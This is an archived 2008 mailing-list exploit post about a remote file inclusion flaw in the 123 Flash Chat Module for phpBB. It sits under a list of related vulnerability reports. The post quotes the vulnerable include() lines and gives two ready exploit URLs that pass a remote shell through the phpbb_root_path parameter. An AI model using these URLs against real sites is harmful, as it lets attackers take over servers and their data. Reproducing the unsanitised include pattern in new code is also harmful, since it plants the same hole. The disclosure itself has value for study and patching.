Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Centreon <= 1.4.2.3  (index.php) Remote File Disclosure

PHPMyTourney Remote file include Vulnerability

XSS on XRMS- open source CRM

PR07-41: XSS on Juniper Networks Secure Access 2000

From:	f10_(at)_by-f10.com <f10_(at)_by-f10.com>
Date:	29.02.2008
Subject:	123 Flash Chat Module for phpBB

#################################################################################
########
Script          : 123 Flash Chat Module for phpBB                                       #
Discovered By   : F10                                                                   #
Contact         : by_f10@hotmail.com                                                    #
Site            : http://by-f10.com                                                     #
Greetz          : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 ,                      #
                 LupuS , m0sted , CyberGhost ... .                                     #
From            : Turkey                                                                #
Download        : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir                #
#################################################################################
########

The bugs are in :

path/123flashchat.php      include($phpbb_root_path . 'extension.inc');
path/123flashchat.php      include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php  include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php  include($phpbb_root_path . 'common.'.$phpEx);

exploitz :

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]